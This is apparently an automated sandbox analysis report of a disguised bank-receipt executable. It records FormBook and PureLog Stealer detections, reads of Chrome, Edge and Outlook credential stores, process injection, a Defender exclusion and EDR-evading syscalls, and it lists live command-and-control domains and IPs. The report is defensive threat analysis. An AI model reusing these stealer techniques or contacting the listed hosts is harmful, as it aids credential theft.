Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Queries volume information: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected FormBook
Source: Yara match File source: 10.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000E.00000002.4510906943.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.4523355689.0000000004AE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2177190183.00000000018A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2296111167.0000000002030000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2178313752.00000000027A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2176518453.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.4521932134.0000000003330000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2297091636.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.4521296649.0000000003100000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.4521828690.0000000002D20000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.4521230365.0000000003110000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Yara detected PureLog Stealer
Source: Yara match File source: 0.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.6a70000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.6a70000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.249674c.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.OkLsTLaTTZVp.exe.2e766ac.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.249674c.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.OkLsTLaTTZVp.exe.2e766ac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.2095435358.0000000006A70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2120592413.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2075185488.0000000002471000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\SysWOW64\sc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\SysWOW64\sc.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ Jump to behavior

Remote Access Functionality
barindex
Yara detected FormBook
Source: Yara match File source: 10.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000E.00000002.4510906943.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.4523355689.0000000004AE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2177190183.00000000018A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2296111167.0000000002030000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2178313752.00000000027A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2176518453.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.4521932134.0000000003330000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2297091636.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.4521296649.0000000003100000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.4521828690.0000000002D20000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.4521230365.0000000003110000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Yara detected PureLog Stealer
Source: Yara match File source: 0.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.6a70000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.6a70000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.249674c.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.OkLsTLaTTZVp.exe.2e766ac.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.249674c.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.OkLsTLaTTZVp.exe.2e766ac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.2095435358.0000000006A70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2120592413.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2075185488.0000000002471000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1417513 Sample: Axis Bank - 67 Account Pend... Startdate: 29/03/2024 Architecture: WINDOWS Score: 100 65 www.heolty.xyz 2->65 67 www.rprostranstvo.ru 2->67 69 19 other IPs or domains 2->69 75 Snort IDS alert for network traffic 2->75 77 Malicious sample detected (through community Yara rule) 2->77 79 Antivirus detection for URL or domain 2->79 83 15 other signatures 2->83 10 Axis Bank - 67 Account Pending Bank Receipt.pdf.exe 7 2->10         started        14 OkLsTLaTTZVp.exe 5 2->14         started        signatures3 81 Performs DNS queries to domains with low reputation 65->81 process4 file5 55 C:\Users\user\AppData\...\OkLsTLaTTZVp.exe, PE32 10->55 dropped 57 C:\Users\user\AppData\Local\...\tmp566C.tmp, XML 10->57 dropped 85 Adds a directory exclusion to Windows Defender 10->85 87 Injects a PE file into a foreign processes 10->87 16 Axis Bank - 67 Account Pending Bank Receipt.pdf.exe 10->16         started        19 powershell.exe 23 10->19         started        21 powershell.exe 23 10->21         started        27 2 other processes 10->27 89 Antivirus detection for dropped file 14->89 91 Multi AV Scanner detection for dropped file 14->91 93 Machine Learning detection for dropped file 14->93 23 OkLsTLaTTZVp.exe 14->23         started        25 schtasks.exe 14->25         started        signatures6 process7 signatures8 71 Maps a DLL or memory area into another process 16->71 29 IiPvZGpNYiTIbQIQLaPZIDOIY.exe 16->29 injected 32 WmiPrvSE.exe 19->32         started        34 conhost.exe 19->34         started        36 conhost.exe 21->36         started        38 IiPvZGpNYiTIbQIQLaPZIDOIY.exe 23->38 injected 40 conhost.exe 25->40         started        42 conhost.exe 27->42         started        process9 signatures10 103 Found direct / indirect Syscall (likely to bypass EDR) 29->103 44 sc.exe 13 29->44         started        105 Maps a DLL or memory area into another process 38->105 47 sc.exe 38->47         started        process11 signatures12 95 Tries to steal Mail credentials (via file / registry access) 44->95 97 Tries to harvest and steal browser information (history, passwords, etc) 44->97 99 Writes to foreign memory regions 44->99 101 3 other signatures 44->101 49 IiPvZGpNYiTIbQIQLaPZIDOIY.exe 44->49 injected 53 firefox.exe 44->53         started        process13 dnsIp14 59 www.heolty.xyz 162.0.238.43, 49723, 49724, 49725 NAMECHEAP-NETUS Canada 49->59 61 www.hardtables.store 87.236.16.168, 49709, 80 BEGET-ASRU Russian Federation 49->61 63 10 other IPs or domains 49->63 73 Found direct / indirect Syscall (likely to bypass EDR) 49->73 signatures15
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
91.195.240.117
 www.ruplome.store Germany
47846 SEDO-ASDE false
162.0.238.43
 www.heolty.xyz Canada
22612 NAMECHEAP-NETUS true
87.236.16.168
 www.hardtables.store Russian Federation
198610 BEGET-ASRU true
94.73.151.78
 ozenmoda.com Turkey
34619 CIZGITR false
89.252.183.131
 alpinalpes.com Turkey
42926 RADORETR false
185.72.146.135
 rprostranstvo.ru Russian Federation
201499 FULLSPACE-ASRU false
198.38.83.196
 www.cr-pos.com United States
23352 SERVERCENTRALUS false
208.91.197.27
 www.ojaitangerines.com Virgin Islands (BRITISH)
40034 CONFLUENCE-NETWORK-INCVG false
84.32.84.32
 gamesun.website Lithuania
33922 NTT-LT-ASLT false
91.195.240.19
 parkingpage.namecheap.com Germany
47846 SEDO-ASDE false
183.111.183.31
 jnkinteractive.co.kr Korea Republic of
4766 KIXS-AS-KRKoreaTelecomKR false
136.0.69.78
 www.brandprome.com United States
18779 EGIHOSTINGUS false

Contacted Domains

Name IP Active
www.cr-pos.com 198.38.83.196 true
www.hardtables.store 87.236.16.168 true
gamesun.website 84.32.84.32 true
alpinalpes.com 89.252.183.131 true
jnkinteractive.co.kr 183.111.183.31 true
www.heolty.xyz 162.0.238.43 true
parkingpage.namecheap.com 91.195.240.19 true
www.ojaitangerines.com 208.91.197.27 true
ozenmoda.com 94.73.151.78 true
rprostranstvo.ru 185.72.146.135 true
www.brandprome.com 136.0.69.78 true
www.ruplome.store 91.195.240.117 true
www.alpinalpes.com unknown unknown
www.oyoing.com unknown unknown
www.ozenmoda.com unknown unknown
www.rprostranstvo.ru unknown unknown
www.jnkinteractive.co.kr unknown unknown
www.dreamdriss.lol unknown unknown
www.gamesun.website unknown unknown
www.maiilchannels.net unknown unknown
www.lucathicke.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.maiilchannels.net/i9if/ true
  • Avira URL Cloud: safe
 unknown
http://www.ruplome.store/i9if/ false
  • Avira URL Cloud: safe
 unknown
http://www.oyoing.com/i9if/ true
  • 1%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown
http://www.heolty.xyz/i9if/ false
  • Avira URL Cloud: safe
 unknown
http://www.gamesun.website/i9if/ false
  • Avira URL Cloud: safe
 unknown
http://www.brandprome.com/i9if/ false
  • Avira URL Cloud: safe
 unknown
http://www.dreamdriss.lol/i9if/ true
  • Avira URL Cloud: safe
 unknown
http://www.ozenmoda.com/i9if/ false
  • Avira URL Cloud: safe
 unknown
http://www.lucathicke.com/i9if/ true
  • Avira URL Cloud: safe
 unknown
http://www.jnkinteractive.co.kr/i9if/ false
  • Avira URL Cloud: safe
 unknown
http://www.alpinalpes.com/i9if/ false
  • Avira URL Cloud: malware
 unknown
http://www.cr-pos.com/i9if/ false
  • Avira URL Cloud: safe
 unknown
http://www.ojaitangerines.com/i9if/ false
  • Avira URL Cloud: safe
 unknown
http://www.rprostranstvo.ru/i9if/ false
  • Avira URL Cloud: safe
 unknown